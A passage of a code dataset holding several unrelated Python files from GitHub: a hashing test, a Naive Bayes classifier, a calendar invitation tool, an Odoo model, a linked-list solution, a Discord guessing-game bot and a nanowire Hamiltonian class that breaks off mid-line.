base64.b16decode(hexstr.upper())\n # leftover = len(raw_bytes) % 5\n # # Pad the last quantum with zero bits if necessary\n # if leftover:\n # raw_bytes = raw_bytes + b'\\0' * (5 - leftover) # Don't use += !\n x = int.from_bytes(raw_bytes, 'big', signed=False)\n r = 0\n digits = []\n while x:\n x, r = divmod(x, baselen)\n digits.append(base[r])\n print(r)\n digits.reverse()\n newbase_str = ''.join(digits)\n print(newbase_str)\n\n import baseconv\n base32_digits = ''.join(ub.util_hash._ALPHABET_32)\n base16_digits = ''.join(ub.util_hash._ALPHABET_16)\n class MyHexConvertor(baseconv.BaseConverter):\n decimal_digits = base16_digits\n\n co = MyHexConvertor(base32_digits)\n print(f'hexstr={hexstr}')\n got = co.encode(hexstr)\n print(f'got={got}')\n\n co = MyHexConvertor(base16_digits)\n co.decimal_digits = base32_digits\n redid = co.encode(got)\n print(f'redid={redid}')\n\n r\"\"\"\n echo \"foobar\" > test.txt\n ipfs add --only-hash test.txt --cid-version=1\n\n # https://github.com/multiformats/py-multibase\n pip install py-multibase\n\n from multibase import encode, decode\n hasher_obj = ub.util_hash._rectify_hasher('sha256')()\n hasher_obj.update(b'foobar')\n raw_bytes = hasher_obj.digest()\n\n raw_bytes = b'\\xc3\\xab\\x8f\\xf17 \\xe8\\xad\\x90G\\xdd9Fk<\\x89t\\xe5\\x92\\xc2\\xfa8=J9`qL\\xae\\xf0\\xc4\\xf2'\n encode('base32', raw_bytes).upper()\n encode('base32upper', raw_bytes).upper()\n\n \"\"\"\n if base == list(base64._b32alphabet.decode()):\n # NOTE: This code has an incompatability with standard base encodings\n # because it does not pad the bytes. I.e. for base 64 3 bytes are\n # converted into 4 characters, so we need a input string divisible by\n # 3. For base32 5 bytes are converted into 2 characters.\n # in general we have to find lowest N and M such that\n #\n # N = number of characters in the encoding\n # M = number of bytes in the input\n #\n # Usually N > M\n #\n # ** N == (2 ** 8) ** M\n # or\n # ** N == (2 ** (8 * M))\n #\n # e.g. For base=64\n # 64 ** 4 == (2 ** 8) ** 3\n #\n # e.g. For base=32\n # 32 ** 8 == (2 ** 8) ** 5\n #\n # In general need find integer solutions for:\n # M = log(B**N)/(8*log(2))\n # or\n # N = log(256 ** M)/log(B)\n\n if 0:\n import sympy\n N, M, B = sympy.symbols('N, M, B')\n eqn = sympy.Eq((B ** N), ((2 ** 8) ** M))\n solutions = sympy.solve(eqn, N)\n print('solutions = {}'.format(ub.urepr(solutions, nl=1)))\n b = 64\n for soln in solutions:\n for m in range(1, 10):\n ans = soln.subs({M: m, B: b}).evalf()\n real, imag = ans.as_real_imag()\n if abs(imag) < 1e-8:\n fracs = real - int(real)\n if fracs < 1e-8:\n print(f'n={m}')\n print(soln)\n print(ans)\n raise Exception\n\n # There is no integer solution for base 26\n base_size = 26\n import math\n for i in range(0, 100):\n num_input_bytes = i\n num_output_symbols = math.log(256 ** num_input_bytes, base_size)\n print(f'{num_input_bytes} > {num_output_symbols}')\n\n # check\n # alphabet = base64._b32alphabet\n # s = raw_bytes\n # desired = base64.b32encode(raw_bytes)\n # print(f'desired={desired}')\n # print(f'newbase_str={newbase_str}')\n\n # leftover = len(s) % 5\n # # Pad the last quantum with zero bits if necessary\n # if leftover:\n # s = s + b'\\0' * (5 - leftover) # Don't use += !\n # encoded = bytearray()\n # from_bytes = int.from_bytes\n # b32tab2 = base64._b32tab2[alphabet]\n # for i in range(0, len(s), 5):\n # if 1:\n # i = 0\n # c = from_bytes(s[i: i + 5], 'big')\n # first = (b32tab2[c >> 30] + # bits 1 - 10\n # b32tab2[(c >> 20) & 0x3ff] + # bits 11 - 20\n # b32tab2[(c >> 10) & 0x3ff] + # bits 21 - 30\n # b32tab2[c & 0x3ff] # bits 31 - 40\n # )\n\n\nif __name__ == '__main__':\n r\"\"\"\n CommandLine:\n python ~/code/ubelt/ubelt/tests/test_hash.py\n pytest ~/code/ubelt/ubelt/tests/test_hash.py\n \"\"\"\n import xdoctest\n xdoctest.doctest_module(__file__)\n","repo_name":"Erotemic/ubelt","sub_path":"tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":25443,"program_lang":"python","lang":"en","doc_type":"code","stars":694,"dataset":"github-code","pt":"72"} +{"seq_id":"13943124547","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom collections import Counter, defaultdict\r\n\r\nimport numpy as np\r\n\r\n\r\n# Ritorna un dizionario contenente il logaritmo delle probabilità per ogni classe\r\ndef occurrences(list):\r\n no_of_examples = len(list)\r\n prob = dict(Counter(list)) # Conta il numero di volte che ciascuna classe compare nel train\r\n for key in prob:\r\n prob[key] = np.log(prob[key] / no_of_examples)\r\n return prob\r\n\r\n\r\n# Calcola il logaritmo di P(word | class) nella versiona di Bernoulli applicando il Laplace smoothing\r\ndef bernoulliOccurrencesLikelihoods(list, no_document_classes):\r\n\r\n count = dict(Counter(list))\r\n nword = 0 # No. documenti contenenti la parola in esame\r\n for key in count:\r\n if(key != 0):\r\n nword += count[key]\r\n\r\n probability = np.log((nword + 1) / (no_document_classes + 2))\r\n return probability\r\n\r\n# Calcola il logaritmo di P(word | class) nella versione multinomiale applicando il Laplace smoothing\r\ndef multinomialOccurrencesLikelihoods(list, no_words_classes, no_words_vacublary):\r\n\r\n count = dict(Counter(list))\r\n nword = 0\r\n for key in count:\r\n if(key != 0):\r\n nword += (key * count[key])\r\n\r\n probability = np.log((nword + 1) / (no_words_classes + no_words_vacublary))\r\n return probability\r\n\r\n\r\n# Metodo che ritorna due array di dimensione (numero_classi) * (no_parole_vocabolario)\r\n# log_prob : contiene il logaritmo di P(word | class) per ogni word nel vocabolario e per ogni classe\r\n# log_prob_neg : contiene il logaritmo di (1 - P(word | class)) per ogni word nel vocabolario e per ogni classe\r\ndef bernoulliModel(classes, train_counts, train_target):\r\n\r\n rows, cols = train_counts.get_shape()\r\n log_prob_neg = np.ndarray(shape = (len(classes), cols), dtype = float)\r\n log_prob = np.ndarray(shape = (len(classes), cols), dtype = float)\r\n\r\n index = 0\r\n for cls in classes:\r\n row_indices = np.where(train_target == cls)[0]\r\n subset = train_counts[row_indices, :]\r\n row_subset, cols_subset = subset.get_shape()\r\n for j in range(cols_subset):\r\n subset_col = subset.getcol(j)\r\n log_prob[index][j] = bernoulliOccurrencesLikelihoods(subset_col.data, row_subset)\r\n log_prob_neg[index][j] = np.log(1 - np.exp(log_prob[index][j]))\r\n index += 1\r\n return log_prob, log_prob_neg\r\n\r\n# Ritorna un dizionario di dimensione (numero_classi) * (no_parole_vocabolario) contenete il logaritmo di P(word | class)\r\n# per ogni word nel vocabolario e per ogni classe\r\ndef multinomialModel(classes, train_counts, train_target, no_words_vocabulary):\r\n\r\n log_likelihoods = {}\r\n for cls in classes:\r\n log_likelihoods[cls] = defaultdict(float)\r\n\r\n for cls in classes:\r\n row_indices = np.where(train_target == cls)[0]\r\n subset = train_counts[row_indices,:] # Ottiene la sottomatrice formata dalle solo righe della classe in esame\r\n no_words_classes = subset.sum() # Conta il numero delle parole nella classe\r\n sub_rows, sub_cols = subset.get_shape()\r\n for j in range(sub_cols):\r\n subset_col = subset.getcol(j)\r\n log_likelihoods[cls][j] = multinomialOccurrencesLikelihoods(subset_col.data, no_words_classes, no_words_vocabulary)\r\n\r\n return log_likelihoods\r\n\r\n\r\n# Definisce il classificatore dell'algoritmo Naive Bayes nella versione di bernoulli\r\n# Calcola la P(Class | X) = ln(P(class)) + sommatoria per i da 1 a |V| di (ln(P(xi | class))^xi + ln(1 - P(xi | class))^(1 -xi))\r\n# Ritorna un vettore contenente l'etichette ottenute applicando la tecnica di MAP all'array results\r\ndef bernoulliClassifier(test_counts, classes, log_class_probabilities, log_prob_likelihoods, log_prob_neg_likelihoods):\r\n\r\n rows, cols = test_counts.get_shape()\r\n results = np.ndarray(shape = (rows, len(classes)), dtype = float)\r\n\r\n sum_log_neg = np.sum(log_prob_neg_likelihoods, axis = 1)\r\n index_row_test = 0\r\n for i in range(rows):\r\n row = test_counts.getrow(i)\r\n index_cls = 0\r\n for cls in classes:\r\n sum = log_class_probabilities[cls]\r\n index_row = row.indices\r\n for j in index_row:\r\n sum += (log_prob_likelihoods[index_cls][j] - log_prob_neg_likelihoods[index_cls][j])\r\n sum += sum_log_neg[index_cls]\r\n results[index_row_test][index_cls] = sum\r\n index_cls += 1\r\n index_row_test += 1\r\n\r\n predicted = []\r\n for i in range(rows):\r\n index_cls = None\r\n max = float(\"-inf\")\r\n for cls in classes:\r\n if(results[i][cls] > max):\r\n max = results[i][cls]\r\n index_cls = cls\r\n predicted.append(index_cls)\r\n\r\n return predicted\r\n\r\n# Definisce il classificatore dell'algoritmo di Naive Bayes nella versione multinomiale\r\n# Calcola la P(Class | X) = ln(P(class)) + sommatoria per i da 1 a |V| di ln(P(xi | class) * xi)\r\n# Ritorna un vettore contenente l'etichette ottenute applicando la tecnica di MAP all'array results\r\ndef multinomialClassifier(test_counts, classes, log_likelihoods, log_class_probabilities):\r\n\r\n rows, cols = test_counts.get_shape()\r\n results = {}\r\n for i in range(rows):\r\n results[i] = defaultdict(float)\r\n\r\n index_row_test = 0\r\n for i in range(rows):\r\n row = test_counts.getrow(i)\r\n index_row = row.indices\r\n for cls in classes:\r\n sum = log_class_probabilities[cls]\r\n value_data = 0\r\n for j in index_row:\r\n sum += (log_likelihoods[cls][j] * row.data[value_data])\r\n value_data += 1\r\n results[index_row_test][cls] = sum\r\n index_row_test += 1\r\n\r\n predicted = []\r\n for i in range(rows):\r\n index_cls = None\r\n max = float(\"-inf\")\r\n for cls in classes:\r\n if(results[i][cls] > max):\r\n max = results[i][cls]\r\n index_cls = cls\r\n predicted.append(index_cls)\r\n\r\n return predicted\r\n\r\n# Definisce i passi da eseguire per l'applicazione del classificatore di testo Naive Bayes nella versione di bernoulli\r\n# Ritorna la precisione e la matrice di confusione che il classificatore ha ottenuto\r\ndef bernoulliNB(classes, class_probabilities, train_counts, test_counts, train_target, test_target):\r\n\r\n #Calcolo probabilità condizionata\r\n log_prob_likelihoods, log_prob_neg_likelihoods = bernoulliModel(classes, train_counts, train_target)\r\n\r\n predicted = bernoulliClassifier(test_counts,classes,class_probabilities, log_prob_likelihoods, log_prob_neg_likelihoods)\r\n\r\n accuracy = accuracy_score(test_target, predicted)\r\n conf_matrix = confusion_matrix(test_target, predicted)\r\n\r\n return accuracy, conf_matrix\r\n\r\n# Definisce i passi da eseguire per l'applicazione del classificatore di testo Naive Bayes nella versione multinomiale\r\n# Ritorna la precisione e la matricie di confusione che il classificatore ha ottenuto\r\ndef multinomialNB(classes, class_probabilities, train_counts, test_counts, train_target, test_target):\r\n\r\n rows, cols = train_counts.get_shape()\r\n no_word_vocabulary = cols\r\n\r\n #likelihoods: Calcola il logaritmo delle probabilità condizionate di ogni parola\r\n log_likelihoods = multinomialModel(classes, train_counts, train_target, no_word_vocabulary)\r\n\r\n predicted = multinomialClassifier(test_counts, classes, log_likelihoods, class_probabilities)\r\n\r\n accuracy = accuracy_score(test_target, predicted)\r\n conf_matrix = confusion_matrix(test_target, predicted)\r\n\r\n return accuracy, conf_matrix\r\n\r\n# Costruisce la matrice dei conteggi del train e del test\r\n# Invoca il metodo per calcolare il logaritmo delle probabilità delle classi\r\n# Ritorna le precisioni e le matrici di confusione ottenute applicando i classificatori di Naive Bayes nella versione\r\n# di bernoulli e nella versione multinomiale\r\ndef naiveBayes(train_data, train_target, test_data, test_target):\r\n\r\n # Costruisce la matrice di train dei conteggi dai documenti di 20 newsgroup\r\n count_vector = CountVectorizer(stop_words= 'english', lowercase = True)\r\n train_counts = count_vector.fit_transform(train_data)\r\n\r\n # Costruisce la matrice di test dei conteggi dai documenti di 20 newsgroup\r\n test_counts = count_vector.transform(test_data)\r\n\r\n # Identifica quali sono le classi\r\n classes = np.unique(train_target)\r\n\r\n # Calcola probabilità di ogni classe, P(prior)\r\n log_class_probabilities = occurrences(train_target)\r\n\r\n print(\"I'm applying Bernoulli Naive Bayes...\")\r\n accuracy_bernoulli, conf_matrix_bernoulli = bernoulliNB(classes, log_class_probabilities, train_counts,\r\n test_counts, train_target, test_target)\r\n print(\"I'm applying Multinomial Naive Bayes...\")\r\n accuracy_multinomial, conf_matrix_multinomial = multinomialNB(classes, log_class_probabilities, train_counts,\r\n test_counts, train_target, test_target)\r\n\r\n return accuracy_bernoulli, conf_matrix_bernoulli, accuracy_multinomial, conf_matrix_multinomial\r\n","repo_name":"Bellocci/Implementazione-Naive-Bayes","sub_path":"TextClassification.py","file_name":"TextClassification.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9739765516","text":"import os\nimport sys\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nfrom argparse import ArgumentParser\nfrom icalendar import Calendar, Event\nfrom dateparser import parse\nfrom datetime import datetime, timezone, timedelta\n\n\nload_dotenv()\n\n\ndef main() -> int:\n template = os.environ.get(\"TEMPLATE_FILE\", \"invitation_template.txt\")\n zoom_link = os.environ.get(\"ZOOM_LINK\", \"\")\n timezone_id = 'Europe/Helsinki'\n\n parser = ArgumentParser()\n parser.add_argument(\"date\", type=str)\n parser.add_argument(\"presenter\", type=str)\n parser.add_argument(\"topic\", type=str)\n parser.add_argument(\"--zoom\", type=str, default=zoom_link)\n parser.add_argument(\"--template\", type=str, default=template)\n args = parser.parse_args()\n\n parsed_date = parse(args.date, settings={'TIMEZONE': timezone_id, 'DATE_ORDER': 'DMY'}, languages=['fi', 'en'])\n #print(f\"Original date: {args.date}\")\n #print(\" Parsed date: {}\".format(parsed_date.strftime(\"%a %b %-d, %Y at %H:%M\")))\n\n template = Path(args.template)\n if not template.is_file():\n print(f\"Could not find template file at: {template}.\")\n return -1\n\n print(\"#### INVITATION STARTS ####\\n\")\n with open(template) as template_file:\n template_str = \"\".join(template_file.readlines())\n template_filled = template_str.format(date=parsed_date.strftime(\"%a %b %-d, %Y at %H:%M\"), presenter=args.presenter, topic=args.topic, zoom_link=args.zoom)\n print(template_filled)\n print(\"\\n#### INVITATION ENDS ####\\n\")\n\n def display(cal):\n return cal.to_ical().replace('\\r\\n', '\\n').strip()\n\n cal = Calendar()\n cal.add('prodid', '-//Python Club Calendar Tool//pythonclubcalendartool.turqoosi.net//')\n cal.add('version', '2.0')\n cal.add('calscale', 'GREGORIAN')\n cal.add('tzid', timezone_id)\n\n event = Event()\n event.add('created', datetime.now())\n event.add('dtstart', parsed_date, parameters={'TZID': timezone_id})\n event.add('dtend', parsed_date+timedelta(hours=1), parameters={'TZID': timezone_id})\n event.add('summary', f\"Python Club: {args.topic}\")\n event.add('description', template_filled)\n event['location'] = args.zoom\n\n cal.add_component(event)\n ical = cal.to_ical()\n ical_str = ical.replace(b'\\r\\n', b'\\n').strip().decode()\n\n print(\"#### CAL.ICS STARTS ####\\n\")\n print(ical_str)\n print(\"\\n#### CAL.ICS ENDS ####\\n\")\n\n ical_filename = Path(parsed_date.strftime(\"Python_Club_%Y%m%d_%H%M.ics\"))\n if ical_filename.is_file():\n print(f\"ERROR: File {ical_filename} already exists. Refusing to overwrite.\")\n sys.exit(-1)\n\n with open(ical_filename, 'w') as file:\n file.write(ical_str)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","repo_name":"juusokorhonen/python-club","sub_path":"events/create_invitation.py","file_name":"create_invitation.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5262508091","text":"from odoo import api, fields, models\n\n\nclass ProductSecondaryUnit(models.Model):\n _name = \"product.secondary.unit\"\n _description = \"Product Secondary Unit\"\n\n name = fields.Char(required=True, translate=True)\n code = fields.Char()\n product_tmpl_id = fields.Many2one(\n comodel_name=\"product.template\",\n string=\"Product Template\",\n required=True,\n ondelete=\"cascade\",\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n string=\"Product Variant\",\n ondelete=\"cascade\",\n )\n uom_id = fields.Many2one(\n comodel_name=\"uom.uom\",\n string=\"Secondary Unit of Measure\",\n required=True,\n help=\"Default Secondary Unit of Measure.\",\n )\n dependency_type = fields.Selection(\n selection=[\n (\"dependent\", \"Dependent\"),\n (\"independent\", \"Independent\"),\n ],\n default=\"dependent\",\n help=\"If dependency type is 'dependent' the factor is used \"\n \"to compute quantity in primary unit,\"\n \"otherwise primary and secondary unit are independent. \"\n \"For example if you sell service\"\n \"by package (1 unit for example) and you want to put the \"\n \"real time (ex : 4 hours) to allows employee scheduling\",\n )\n factor = fields.Float(string=\"Secondary Unit Factor\", default=1.0, required=True)\n active = fields.Boolean(default=True)\n\n def name_get(self):\n result = []\n for unit in self:\n result.append(\n (\n unit.id,\n \"{unit_name}-{factor}\".format(\n unit_name=unit.name, factor=unit.factor\n ),\n )\n )\n return result\n\n @api.model\n def name_search(self, name=\"\", args=None, operator=\"ilike\", limit=100):\n if args is None:\n args = []\n units = self.search([(\"code\", \"=\", name)] + args, limit=1)\n if not units:\n return super(ProductSecondaryUnit, self).name_search(\n name=name, args=args, operator=operator, limit=limit\n )\n return units.name_get()\n","repo_name":"OCA/product-attribute","sub_path":"product_secondary_unit/models/product_second_unit.py","file_name":"product_second_unit.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"40299806506","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def removeElements(self, head, val):\r\n \"\"\"\r\n :type head: ListNode\r\n :type val: int\r\n :rtype: ListNode\r\n \"\"\"\r\n if not head:\r\n return None\r\n current = head\r\n previous = None\r\n while current:\r\n if current.val == val:\r\n if current == head:\r\n head = current.next\r\n current = current.next\r\n else:\r\n previous.next=current.next\r\n current=current.next\r\n else:\r\n previous = current\r\n current = current.next\r\n return head","repo_name":"jingweiwu26/Practice_code","sub_path":"203. Remove Linked List Elements.py","file_name":"203. Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8923657269","text":"import os\nimport sys\nimport subprocess\n\n\ndef main():\n if len(sys.argv)!=4:\n print(\"Usage: python3 master.py /path/to/dir/of/tex/dirs/ /path/to/xhtml/output/ /path/to/json/output/\")\n exit()\n path = os.path.abspath(sys.argv[1])\n xhtmlpath = os.path.abspath(sys.argv[2])\n jsonpath = os.path.abspath(sys.argv[3])\n cdir = os.listdir(path)\n outfolders = []\n folders = []\n for x in cdir:\n if os.path.isdir(os.path.join(path,x)) and x[0]!='.':\n outfolders.append(os.path.split(x)[1])\n\n xhtml = []\n json = []\n for x in outfolders:\n xhtml.append(os.path.join(xhtmlpath,x+'_converted/'))\n json.append(os.path.join(jsonpath,x+'_json/'))\n\n for i, x in enumerate(outfolders):\n # print(outfolders[i],xhtml[i],json[i])\n proc = subprocess.Popen([\"python3\",\"convertlatex.py\",os.path.join(path,outfolders[i],'')+'/',xhtml[i]])\n proc.wait()\n proc = subprocess.Popen([\"python3\",\"proctex.py\",os.path.join(path,outfolders[i],'')+'/',xhtml[i],json[i]])\n proc.wait()\n\nif __name__ == '__main__':\n main()\n","repo_name":"hopper-project/hoptex","sub_path":"master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13757310105","text":"import sqlite3\nimport discord\nfrom discord.ext import commands, tasks\nimport datetime\nfrom datetime import date, time\nimport time\nimport asyncio\n\n\ncon = sqlite3.connect('greed.db')\ncur = con.cursor()\n\nclass Greed(commands.Cog, description=\"Greed control\"):\n def __init__(self, client: commands.Bot):\n self.client = client\n self.index = 0\n \n # Place your bet!\n @commands.command(help=\"Place your bets! Syntax: `$greed (number)`\")\n async def greed(self, ctx):\n user_id = ctx.message.author.id\n if self.Jail.check_jail(user_id) == True:\n await ctx.send(\"You can't play greed control in jail!\")\n return\n \n max_bet = Greed.get_user(self, 0)[2]\n await ctx.author.send(\"Pick a number between 1 and \" + str(max_bet) + \".\")\n channel = ctx.author.dm_channel\n def check(m):\n if m.channel != channel:\n return False\n bet = m.content\n try: \n bet = int(bet)\n except:\n return False\n if bet < 1 or bet > max_bet:\n return False\n return True\n bet = await self.client.wait_for(\"message\", check=check, timeout=15)\n bet = int(bet.content) \n previous = Greed.get_user(self, user_id)[2]\n cur.execute(\"UPDATE scores SET bet=? WHERE user=?\", (bet, user_id))\n con.commit()\n if previous == 0:\n await channel.send(\"Successfully picked \" + str(bet) + \"!\")\n else:\n await channel.send(\"Successfully updated the bet to \" + str(bet) + \"!\")\n\n # Displays the current greed control score\n @commands.command(name=\"points_greed\", help=\"Displays your current point total.\")\n async def show_current(self, ctx):\n channel = ctx.message.channel\n user_id = ctx.message.author.id \n points = self.get_user(user_id)[1]\n await channel.send(\"You currently have \" + str(points) + \" points in Greed Control.\")\n\n # Displays a top 10 leaderboard in greed control\n @commands.command(name=\"greederboard\", help=\"Displays the top 10 point scores in greed control.\")\n async def leaderboard(self, ctx):\n channel = ctx.message.channel\n cur.execute(\"SELECT user, score FROM scores ORDER BY score DESC\")\n winners = cur.fetchmany(11)\n del winners[0]\n max_score = float(self.get_user(0)[1])\n string = \"Greed control leaderboard. The score required to win is: \" + str(max_score)\n for i in range(len(winners)):\n user_id = int(winners[i][0])\n user = await self.client.fetch_user(user_id)\n name = user.display_name\n string = string + \"\\n\" + str(name) + \": `\" \\\n + str(winners[i][1]) + \"`\"\n await channel.send(string)\n\n\n\n # Scuffed function to get a function to run at midnight each day, obsolete\n @commands.command()\n async def timer(self, ctx):\n if ctx.message.author.id != 732415222706339840:\n return\n while True:\n current = time.ctime()\n seconds = int(current[17:19])\n minutes = int(current[14:16])\n hours = int(current[11:13])\n wait = (23 - hours)*3600 + (59-minutes)*60 + seconds\n if wait == 0:\n wait = 86400\n print(wait)\n await asyncio.sleep(wait)\n await self.give_points()\n await asyncio.sleep(30)\n \n\n # Distributes points every 24 hours\n async def give_points(self):\n channel_id = 928099803768950834\n channel = await self.client.fetch_channel(channel_id)\n max_bet = int(self.get_user(0)[2])\n max_score = int(self.get_user(0)[1])\n print(max_score)\n\n # Creates list showing how often each number was picked\n freq = []\n for i in range(max_bet):\n freq.append(0)\n\n scores = self.get_full()\n string = \"Points awarded: \"\n del scores[0]\n for user in scores:\n pick = user[2]\n if pick != 0:\n freq[pick-1] += 1\n print(freq)\n\n string = \"Distribution of numbers: \"\n for i in range(max_bet):\n string += \"\\n\" + str(i+1) + \": \" + str(freq[i])\n await channel.send(string)\n\n # Creates list showing points awarded for each number\n points = []\n for i in range(len(freq)):\n if freq[i] == 0:\n points.append(0)\n else:\n points.append(round(int(i+1) / freq[i], 4))\n print(points)\n\n winners = []\n for user in scores:\n user_id = user[0]\n if user[2] > 0:\n earned = points[user[2]-1]\n new_score = round(user[1] + earned, 4)\n if new_score >= max_score:\n winners.append(user_id)\n cur.execute(\"UPDATE scores SET score=?, bet=? WHERE user=?\", (new_score, 0, user_id))\n\n if len(winners) >= 1:\n if len(winners) == 1:\n await channel.send(\"<@\" + str(winners[0]) + \"> has won the game!\")\n else:\n string = \"Winners: \"\n for user_id in winners:\n string += \"\\n<@\" + str(user_id) + \">\"\n await channel.send(string)\n await self.end()\n con.commit()\n\n # test function\n # @commands.command()\n # async def test(self, ctx):\n # await Greed.printer(self)\n\n\n # Makes a new reaper game (this game is global)\n @commands.command(help=\"Begins a new Greed Control game. Note that only specified developers can use this command.\")\n async def new_greed(self, ctx, max_points, max_bet):\n if ctx.message.author.id != 732415222706339840:\n await ctx.message.channel.send(\"You cannot use this command!\")\n return\n cur.execute(\"DROP TABLE IF EXISTS scores\") \n cur.execute(\"CREATE TABLE IF NOT EXISTS scores (user INTEGER, score REAL, bet INTEGER)\")\n cur.execute(\"INSERT INTO scores VALUES (?, ?, ?)\", (0, max_points, max_bet))\n con.commit()\n await ctx.message.channel.send(\"Successfully begun a new Greed Control game.\")\n\n # Deletes the previous greed control table\n @commands.command(help=\"Ends the current Greed Control game. Note that only specified developers can use this command.\")\n async def end_greed(self, ctx):\n if ctx.message.author.id != 732415222706339840:\n await ctx.message.channel.send(\"You cannot use this command!\")\n return\n await self.end()\n await ctx.message.channel.send(\"Successfully ended the current Greed Control game.\") \n\n async def end(self):\n cur.execute(\"DROP TABLE IF EXISTS scores\") \n con.commit()\n \n \n # Gets the score and bet for a user\n def get_user(self, user_id):\n cur.execute(\"SELECT * FROM scores WHERE user=?\", (user_id,))\n data = cur.fetchone()\n if data is None:\n cur.execute(\"INSERT INTO scores VALUES (?, ?, ?)\", (user_id, 0, 0))\n return (user_id, 0, 0)\n else:\n return data \n\n def get_full(self):\n cur.execute(\"SELECT * FROM scores\")\n rows = cur.fetchall()\n return rows \n \ndef setup(client):\n client.add_cog(Greed(client))\n","repo_name":"ricE06/sigmacat","sub_path":"cogs/Greed.py","file_name":"Greed.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23251259101","text":"import os\n\nimport numpy as np\nfrom scipy.linalg import block_diag\nfrom scipy.sparse.linalg import eigsh\n\nimport unit_conversion as uc\n\n# Define the Hamiltonian for a nanowire as a class\n\n\nclass nanowire_hamiltonian:\n # Initialize the Hamiltonian, pot_func is a class that represents the potential\n def __init__(self, alpha, zeeman, chem_pot, sc_gap, eff_mass, nw_length,\n grid_points, pot_func):\n self.alpha = alpha\n self.zeeman = zeeman\n self.chem_pot = chem_pot\n self.sc_gap = sc_gap\n self.eff_mass = eff_mass\n self.pot_func = pot_func\n self.nw_length = nw_length\n self.grid_points = grid_points\n\n self.convert_units()\n self.initialize_grid()\n\n self.hamiltonian = None\n self.eigvals = None\n self.eigvecs = None\n\n def reset_hamiltonian(self):\n self.hamiltonian = None\n self.eigvals = None\n self.eigvecs = None\n\n def adjust_chem_pot(self, chem_pot):\n self.chem_pot = chem_pot\n self.chem_pot *= uc.meV_to_au()\n self.reset_hamiltonian()\n\n def adjust_zeeman(self, zeeman):\n self.zeeman = zeeman\n self.zeeman *= uc.meV_to_au()\n self.reset_hamiltonian()\n\n def get_sc_gap_meV(self):\n return self.sc_gap / uc.meV_to_au()\n\n # Define a function that return a file name for the Hamiltonian, use a dictionary to create a string\n # Restrict precision to 3 digits, write floats in format with power as in 1.234e-05\n def get_file_name(self):\n name_dict = {\n 'alpha': self.alpha,\n 'zeeman': self.zeeman,\n 'chem_pot': self.chem_pot,\n 'sc_gap': self.sc_gap,\n 'eff_mass': self.eff_mass,\n 'nw_length': self.nw_length,\n 'grid_points': self.grid_points\n }\n file_name = ''\n for key, value in name_dict.items():\n file_name += key + '_' + format(value, '.3e') + '_'\n return file_name\n\n def get_data_directory(self):\n directory = '/Users/ma0274ni/Documents/projects/topological_nanowire/data/' + self.pot_func.get_directory_name(\n ) + '/'\n # Check if the directory exists, if not create it\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n return directory + self.get_file_name()\n\n def save_data(self):\n if self.eigvals is None or self.eigvecs is None:\n raise ValueError('You need to run the diagonalization first!')\n else:\n np.save(self.get_data_directory() + 'eigvals.npy', self.eigvals)\n np.save(self.get_data_directory() + 'eigvecs.npy', self.eigvecs)\n\n def check_if_data_exists(self):\n return os.path.exists(self.get_data_directory() + 'eigvals.npy')\n\n def load_data(self):\n # Check if the data exists\n if not self.check_if_data_exists():\n print('Data does not exist, calculating eigenvalues...')\n self.calculate_only_smallest_eigenvalues()\n self.save_data()\n else:\n self.eigvals = np.load(self.get_data_directory() + 'eigvals.npy')\n self.eigvecs = np.load(self.get_data_directory() + 'eigvecs.npy')\n return self.eigvals, self.eigvecs\n\n # Conversion of units to atomic units, previously energies were in meV, lengths in nm, masses in m_e\n def convert_units(self):\n energy_conversion = uc.meV_to_au()\n length_conversion = uc.nm_to_au()\n mass_conversion = uc.m_e_to_au()\n self.alpha = self.alpha * energy_conversion * length_conversion\n self.zeeman = self.zeeman * energy_conversion\n self.chem_pot = self.chem_pot * energy_conversion\n self.sc_gap = self.sc_gap * energy_conversion\n self.eff_mass = self.eff_mass * mass_conversion\n self.nw_length = self.nw_length * length_conversion\n\n # Initialize the grid\n def initialize_grid(self):\n self.dx = self.nw_length / self.grid_points\n self.x = np.arange(0, self.nw_length, self.dx)\n\n def evaluate_potential(self, x):\n return self.pot_func(x)\n\n # Function that greets the user\n def greet(self):\n print(\n \"Hello! I hope you have a nice day! I am a nanowire Hamiltonian.\")\n\n # Function that builds the matrix representation of the Hamiltonian\n def build_hamiltonian(self):\n # Define the sigma matrices using numpy\n sigma_0, sigma_x, sigma_y, sigma_z = self.pauli_matrices()\n\n # Build the block matrices representing the repective terms 1. sigma represents electron-hole dof 2. sigma represents spin dof\n block1 = np.kron(sigma_z, sigma_0)\n block2 = np.kron(sigma_z, sigma_y)\n block3 = np.kron(sigma_x, sigma_0)\n block4 = np.kron(sigma_0, sigma_x)\n\n # Build the diagonal terms\n diag_block_const = (\n +2 / self.dx**2 * 1 / (2 * self.eff_mass) - self.chem_pot\n ) * block1 + self.sc_gap * block3 + self.zeeman * block4\n diag_block = np.array([\n diag_block_const + self.evaluate_potential(site) * block1\n for site in self.x\n ])\n # Cast diag_block to complex\n diag_block = diag_block.astype(complex)\n\n # Build the off-diagonal terms\n upper_off_diag_block = -1 / self.dx**2 * 1 / (\n 2 *\n self.eff_mass) * block1 - 1j * self.alpha / self.dx * 